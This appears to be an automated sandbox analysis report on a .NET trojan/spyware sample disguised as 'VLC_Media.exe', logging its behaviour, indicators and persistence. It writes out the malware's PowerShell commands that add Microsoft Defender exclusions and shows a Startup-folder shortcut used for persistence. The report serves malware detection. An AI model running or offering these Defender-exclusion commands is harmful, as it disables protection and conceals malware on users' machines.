Source: 18fvs4AVae.exe, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 18fvs4AVae.exe, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 18fvs4AVae.exe, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: VLC_Media.exe.0.dr, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: VLC_Media.exe.0.dr, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: VLC_Media.exe.0.dr, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: VLC_Media.exe.0.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: VLC_Media.exe.0.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 18fvs4AVae.exe, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 18fvs4AVae.exe, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@13/20@1/2
Source: C:\Users\user\Desktop\18fvs4AVae.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VLC_Media.lnk
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Mutant created: \Sessions\1\BaseNamedObjects\kkeD0iZ90XXPXCyz
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2000:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8096:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03
Source: C:\Users\user\Desktop\18fvs4AVae.exe | File created: C:\Users\user\AppData\Local\Temp\Log.tmp
Source: 18fvs4AVae.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 18fvs4AVae.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\18fvs4AVae.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 18fvs4AVae.exe | ReversingLabs: Detection: 78%
Source: C:\Users\user\Desktop\18fvs4AVae.exe | File read: C:\Users\user\Desktop\18fvs4AVae.exe
Source: unknown | Process created: C:\Users\user\Desktop\18fvs4AVae.exe "C:\Users\user\Desktop\18fvs4AVae.exe"
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\18fvs4AVae.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '18fvs4AVae.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\VLC_Media.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'VLC_Media.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\18fvs4AVae.exe'
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '18fvs4AVae.exe'
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\VLC_Media.exe'
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'VLC_Media.exe'
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: sxs.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: scrrun.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: linkinfo.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: cscapi.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: avicap32.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: msvfw32.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Section loaded: winmm.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: VLC_Media.lnk.0.dr | LNK file: ..\..\..\..\..\..\..\..\..\ProgramData\VLC_Media.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: 18fvs4AVae.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 18fvs4AVae.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: 18fvs4AVae.exe, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 18fvs4AVae.exe, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 18fvs4AVae.exe, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: VLC_Media.exe.0.dr, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: VLC_Media.exe.0.dr, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: VLC_Media.exe.0.dr, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 18fvs4AVae.exe, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 18fvs4AVae.exe, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
Source: 18fvs4AVae.exe, Messages.cs | .Net Code: Memory
Source: VLC_Media.exe.0.dr, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
Source: VLC_Media.exe.0.dr, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
Source: VLC_Media.exe.0.dr, Messages.cs | .Net Code: Memory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B76D2A5 pushad ; iretd 1_2_00007FFD9B76D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B952316 push 8B485F94h; iretd 1_2_00007FFD9B95231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD9B77D2A5 pushad ; iretd 4_2_00007FFD9B77D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD9B890FFA push E85E51FBh; ret 4_2_00007FFD9B8910F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD9B8910FA push E85E51FBh; ret 4_2_00007FFD9B8910F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD9B967F5F push ecx; iretd 4_2_00007FFD9B967F61
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD9B962316 push 8B485F93h; iretd 4_2_00007FFD9B96231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FFD9B79D2A5 pushad ; iretd 9_2_00007FFD9B79D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FFD9B982316 push 8B485F91h; iretd 9_2_00007FFD9B98231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FFD9B78D2A5 pushad ; iretd 11_2_00007FFD9B78D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FFD9B979B7A push 9000009Bh; retf 11_2_00007FFD9B979BC1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FFD9B972316 push 8B485F92h; iretd 11_2_00007FFD9B97231B
Source: C:\Users\user\Desktop\18fvs4AVae.exe | File created: C:\ProgramData\VLC_Media.exe

Boot Survival

Source: Yara match | File source: 18fvs4AVae.exe, type: SAMPLE
Source: Yara match | File source: 0.0.18fvs4AVae.exe.480000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1683273081.0000000000482000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: C:\ProgramData\VLC_Media.exe, type: DROPPED
Source: C:\Users\user\Desktop\18fvs4AVae.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VLC_Media.lnk

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
